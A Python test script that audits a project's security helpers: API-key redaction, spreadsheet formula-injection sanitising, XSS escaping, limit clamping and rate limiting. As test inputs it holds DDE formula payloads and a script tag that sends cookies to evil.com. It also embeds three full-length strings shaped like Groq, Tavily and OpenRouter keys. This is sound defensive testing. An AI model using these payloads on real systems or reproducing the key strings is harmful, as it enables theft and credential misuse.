import os
import sys

# Ensure project root in sys.path
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))

from src.services.security import (
    verify_access_password,
    redact_secrets,
    sanitize_html_text,
    check_search_cooldown,
    clamp_lead_limit
)
from src.services.normalizer import sanitize_formula_injection

def run_security_audit():
    print("==================================================")
    print("RUNNING COMPREHENSIVE SECURITY AUDIT SUITE")
    print("==================================================")

    # 1. Secret Redaction Filter Audit
    print("[TEST 1] Testing Output Redaction Filter...")
    leaked_sample = (
        "Generated by Groq: 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. "
        "Also Tavily key: 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. "
        "Authorization: Bearer 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"
    )
    scrubbed = redact_secrets(leaked_sample)
    print("Scrubbed text:", scrubbed[:120], "...")
    assert "gsk_" not in scrubbed, "Groq key leaked!"
    assert "tvly-" not in scrubbed, "Tavily key leaked!"
    assert "sk-or-" not in scrubbed, "OpenRouter key leaked!"
    print("-> PASSED: All API keys successfully intercepted & redacted!")

    # 2. CSV / Spreadsheet Formula Injection Audit
    print("\n[TEST 2] Testing Formula Injection Defense (CSV / DDE)...")
    malicious_payloads = [
        "=cmd|' /C calc'!A0",
        "@SUM(1+1)*cmd|' /C notepad'!A0",
        "+12345",
        "-DDE(\"server\";\"pipe\")",
        "|malicious_pipe"
    ]
    for p in malicious_payloads:
        safe = sanitize_formula_injection(p)
        assert safe.startswith("'"), f"Payload {p} was not neutralized!"
        print(f"  Sanitized: {p[:20]} -> {safe[:20]}")
    print("-> PASSED: All formula injection triggers neutralized with single-quote prepending!")

    # 3. HTML XSS Injection Audit
    print("\n[TEST 3] Testing Cross-Site Scripting (XSS) Sanitization...")
    xss_payload = "<script>fetch('http://evil.com?c=' + document.cookie)</script>"
    safe_xss = sanitize_html_text(xss_payload)
    assert "<script>" not in safe_xss, "Raw HTML script tag allowed!"
    assert "&lt;script&gt;" in safe_xss
    print("-> PASSED: XSS script tags neutralized!")

    # 4. Result Limit Clamping Audit (DoS Protection)
    print("\n[TEST 4] Testing Result Limit Clamping (512MB RAM Shield)...")
    assert clamp_lead_limit(500, max_cap=100) == 100, "High limit was not clamped!"
    assert clamp_lead_limit(2, max_cap=100) == 5, "Below min limit was not normalized!"
    assert clamp_lead_limit(50, max_cap=100) == 50
    print("-> PASSED: Query limits strictly clamped to max 100 to prevent OOM!")

    # 5. Search Cooldown Audit
    print("\n[TEST 5] Testing Search Cooldown Rate Limiting...")
    import time
    real_now = time.time()
    allowed, wait = check_search_cooldown(real_now - 1.0, cooldown_seconds=4.0)
    assert not allowed, "Fast successive search was erroneously allowed!"
    print(f"  Blocked with wait time: {wait}s")
    allowed_later, _ = check_search_cooldown(real_now - 5.0, cooldown_seconds=4.0)
    assert allowed_later, "Search after cooldown was erroneously blocked!"
    print("-> PASSED: Rate-limiting cooldown active!")

    print("\n==================================================")
    print("ALL 5 CRITICAL SECURITY TESTS PASSED 100%!")
    print("==================================================")

if __name__ == "__main__":
    run_security_audit()
